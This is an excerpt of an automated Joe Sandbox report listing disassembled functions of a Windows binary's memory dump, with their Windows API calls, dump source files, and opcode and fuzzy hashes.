                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 009C042A
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C0446
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 009C045D
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C047B
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 009C0492
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C04B0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                                                  • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                  • Instruction ID: bf57cc220148c3718f19be557e1716e91d999e1b7ea9a4c42570a2439d6cb7fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B781F671E0070ADBE724AF69CC82F6BB3A8AFD4764F24452EF511D6691E770D9008752
                                                                                                                                                                                                                                  Function 009C6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009B8649,009B8649,?,?,?,009C67C2,00000001,00000001,8BE85006), ref: 009C65CB
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009C67C2,00000001,00000001,8BE85006,?,?,?), ref: 009C6651
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009C674B
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C6758
                                                                                                                                                                                                                                    • Part of subcall function 009C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,009B6A79,?,0000015D,?,?,?,?,009B85B0,000000FF,00000000,?,?), ref: 009C3BC5
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C6761
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C6786
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                  • Opcode ID: 7f6c222535f7a6c7cfd61b983ddc603cc20eb8627ac7a71c72ee25553e3dcfe2
                                                                                                                                                                                                                                  • Instruction ID: 0103a07a5981a168bfc5e3126cbbcdcbd4221cddd7bd40937734577174364227
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f6c222535f7a6c7cfd61b983ddc603cc20eb8627ac7a71c72ee25553e3dcfe2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D51E172E00206AFEB258F64CD85FBB77AAEB84754F144A6DFC08D6140EB35DC51C6A2
                                                                                                                                                                                                                                  Function 00A1C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A1C10E,?,?), ref: 00A1D415
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D451
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4C8
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4FE
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C72A
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A1C785
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1C7CA
                                                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A1C7F9
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A1C853
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00A1C85F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1120388591-0
                                                                                                                                                                                                                                  • Opcode ID: 74274ca6a9df35fcb40693a51a2618ea609eb4de7c7d3f1c5598611f81ff7f25
                                                                                                                                                                                                                                  • Instruction ID: 9722e22ceee263ed3c45d2a60fdf20492fc549a7da335cd275cdaf1c3c21835e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74274ca6a9df35fcb40693a51a2618ea609eb4de7c7d3f1c5598611f81ff7f25
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF81AF71108241AFD714DF28C885F6ABBE5FF84318F14845CF0594B2A2DB71ED46CB92
                                                                                                                                                                                                                                  Function 009F009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(00000035), ref: 009F00A9
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 009F0150
                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(009F0354,00000000), ref: 009F0179
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(009F0354), ref: 009F019D
                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(009F0354,00000000), ref: 009F01A1
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009F01AB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3859894641-0
                                                                                                                                                                                                                                  • Opcode ID: 59b2c437812beed225a4e81808c9b0ebc15dc194218009f3f27b6dd7d3ea96a9
                                                                                                                                                                                                                                  • Instruction ID: 7c7dcc924ce556a079b1ed799f39a07a5e28809fdfe1a2aade8a17a232ead2af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59b2c437812beed225a4e81808c9b0ebc15dc194218009f3f27b6dd7d3ea96a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A251FC31600318A6DF20AB64988977DB3ADEFC5310F249457FA05DF297DB749C41DBA1
                                                                                                                                                                                                                                  Function 00A09B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00A09F2A
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A09F4B
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A09F72
                                                                                                                                                                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00A09FCA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                  • String ID: X
                                                                                                                                                                                                                                  • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                  • Opcode ID: bb17e8d7c035e06964843b08d04c59f390728db9777b6aa59ea6baa6e38f0411
                                                                                                                                                                                                                                  • Instruction ID: 61cdc525f388bbbc65e23721c6ac0c3d00c13a11885051684f08d9423c49f119
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb17e8d7c035e06964843b08d04c59f390728db9777b6aa59ea6baa6e38f0411
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE180715083459FDB24EF28D881B6BB7E4BF84314F04896DF8899B2A2DB31DD05CB92
                                                                                                                                                                                                                                  Function 00A06ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A06F21
                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00A0707E
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00A30CC4,00000000,00000001,00A30B34,?), ref: 00A07095
                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00A07319
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                                                                                  • API String ID: 886957087-24824748
                                                                                                                                                                                                                                  • Opcode ID: 873e79de0ae9271fbd99992b69afca23479dc716640f7a438f8079f331cc4a69
                                                                                                                                                                                                                                  • Instruction ID: 226c0e71c8b7a607a5cc87979beda255b3ac8f6285c4bfd2ab193f676f85da73
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873e79de0ae9271fbd99992b69afca23479dc716640f7a438f8079f331cc4a69
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D14771508205AFD700EF28D881E6BB7E8FF98708F40496DF5858B2A2DB71ED05CB92
                                                                                                                                                                                                                                  Function 00991B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 00991B35
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00991B99
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00991BB6
                                                                                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00991BC7
                                                                                                                                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00991C15
                                                                                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009D3287
                                                                                                                                                                                                                                    • Part of subcall function 00991C2D: BeginPath.GDI32(00000000), ref: 00991C4B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3050599898-0
                                                                                                                                                                                                                                  • Opcode ID: f7d5805a7d035de653c49748296cd2f298aa19d49c4592ac1debddb2ef159569
                                                                                                                                                                                                                                  • Instruction ID: 7e684eea8f8d16c68da9407ae330ffd1ef27497a804b9065ad6eec3c82aaea88
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7d5805a7d035de653c49748296cd2f298aa19d49c4592ac1debddb2ef159569
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E41F171544301AFDB20DF68DC84FB67BB8FB85320F044629FAA4872B2C7709946DB62
                                                                                                                                                                                                                                  Function 00A01196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A011B3
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A011EE
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00A0120A
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00A01283
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A0129A
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A012C8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3368777196-0
                                                                                                                                                                                                                                  • Opcode ID: ba42112f5d6e944da3bb0f99e17225e7d5f00c3ab465249ea54903ced616dcbf
                                                                                                                                                                                                                                  • Instruction ID: f44d96d3c31bf6fccb8773a657078128231df25d84fb6d71e29f00daf58395cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba42112f5d6e944da3bb0f99e17225e7d5f00c3ab465249ea54903ced616dcbf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B414C71900205EFDF14DF98DD85AAAB7B8FF48314F1481B5ED00AA296D730DE62DBA4
                                                                                                                                                                                                                                  Function 00A28C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,009EFBEF,00000000,?,?,00000000,?,009D39E2,00000004,00000000,00000000), ref: 00A28CA7
                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00A28CCD
                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A28D2C
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00A28D40
                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00A28D66
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A28D8A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                                                                                                  • Opcode ID: daed008428db9df32993ff1673ab42528b4e62a1c0a5d9024d9e9027bb909670
                                                                                                                                                                                                                                  • Instruction ID: 05aa124b7a98f0444cd33163e832c6d6e32dc4f7848a5c11404149109bc59c28
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daed008428db9df32993ff1673ab42528b4e62a1c0a5d9024d9e9027bb909670
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05419730603664AFEB25DF68E889BA57BF1FB45304F184075F5085B2A2CB799856CB50
                                                                                                                                                                                                                                  Function 00A12D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 00A12D45
                                                                                                                                                                                                                                    • Part of subcall function 00A0EF33: GetWindowRect.USER32(?,?), ref: 00A0EF4B
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00A12D6F
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00A12D76
                                                                                                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A12DB2
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00A12DDE
                                                                                                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A12E3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2387181109-0
                                                                                                                                                                                                                                  • Opcode ID: da997cb0074387c11d69140cb6fa6aef0aa92d8255fbe10f6ea027db439697dc
                                                                                                                                                                                                                                  • Instruction ID: f4817dd131ed4f3d1d16fdba63201bb1555cc5dd9235021bd0a0ed0ae02febe3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da997cb0074387c11d69140cb6fa6aef0aa92d8255fbe10f6ea027db439697dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44311072505315AFC720DF58D844FABB7A9FFC4354F000929F88497181DB70E95ACB92
                                                                                                                                                                                                                                  Function 009F55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 009F55F9
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009F5616
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009F564E
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009F566C
                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009F5674
                                                                                                                                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 009F567E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 72514467-0
                                                                                                                                                                                                                                  • Opcode ID: e59ead8e2fa6efd0a140ff2b0e0ef4da65ec76dfe50348ad7fb2b7a9e412a8ee
                                                                                                                                                                                                                                  • Instruction ID: 7353a7b74ffbe3113d4883e133d6b0bfd942cc129fca581611830f8c792020c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e59ead8e2fa6efd0a140ff2b0e0ef4da65ec76dfe50348ad7fb2b7a9e412a8ee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF2138322046087BEB259B78DC49FBB7BACDF84720F158039FA05DA092EF64CC429760
